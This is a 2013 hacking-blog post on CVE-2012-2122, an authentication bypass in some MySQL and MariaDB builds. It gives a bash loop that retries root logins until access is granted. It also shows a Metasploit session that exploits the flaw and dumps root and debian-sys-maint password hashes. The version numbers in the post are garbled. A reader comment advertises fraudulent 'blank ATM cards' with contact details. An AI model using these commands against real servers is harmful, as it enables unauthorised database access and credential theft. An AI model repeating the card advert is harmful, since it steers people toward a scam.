Subscribe For Free Updates!

We'll not spam mate! We promise.

Sunday, 1 September 2013

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB

The news about the vulnerability in MySQL and MariaDB spreads like a wildfire I have covered about this vulnerability in E Hacking news as news article. Here, i am going to share the same thing from the perspective of a penetration tester.

The MySQL and MariaDB versions 5.161,5.2.11,5.3.5 and 5.5.c2 are affected version.

The vulnerability allows an attacker to access MySQL database without inputing proper authentication credentials. The vulnerability can only exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range. 

According to Gokubchik the gcc build in memcmp and BSD libc are safe bu the linux glibc sse-optimised memcmp is not safe.

Not all linux distro  are affected, only the following systems are vulnerable:
*ubuntu linux 64 bit(10.04,11.10,11.04,12.04)
*openSUSE 12.1 64 bit MySQL 5.5.23-log
*Debin Unstable 64 bit 5.5.23.2
*Fedora
*Arch Linux

In order to test the vulnerability, run the followoing bash script:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.12>/dev/null; done

The above code will provide access to an affectte MySQL Server as the root user account.

The following video is provided by one of EHN reader:


Exploiting using Metasploit :
one of metasploit contributor committee a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.:

$ msfconsolemsf > use auxiliary/scanner/mysql/mysql_authbypass_hashdumpmsf auxiliary(mysql_authbypass_hashdump) > set USERNAME rootmsf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1msf auxiliary(mysql_authbypass_hashdump) > run[+] 127.0.0.1:3306The server allows logins, proceeding with bypass test[*] 127.0.0.1:3306Authentication bypass is 10% complete[*] 127.0.0.1:3306Authentication bypass is 20% complete[*] 127.0.0.1:3306Successfully bypassed authentication after 205 attempts[+] 127.0.0.1:3306Successful exploited the authentication bypass flaw, dumping hashes...[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89[*] 127.0.0.1:3306Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed


LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES
Credit Zoombie Hacker

Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

1 comments:

  1. I am a Single full time dad on disability getting no help from their moms. It a struggle every day. My boys are 15 and 9 been doing this by myself for 8 years now it’s completely drained all my savings everything . These guys are the present day ROBIN HOOD. Im back on my feet again and my kids can have a better life all thanks to the blank card i acquired from skylink technology. Now i can withdraw up too 3000 per day Contact them as well on Mail: skylinktechnes@yahoo.com   or   whatsspp/telegram: +1(213)785-1553

    ReplyDelete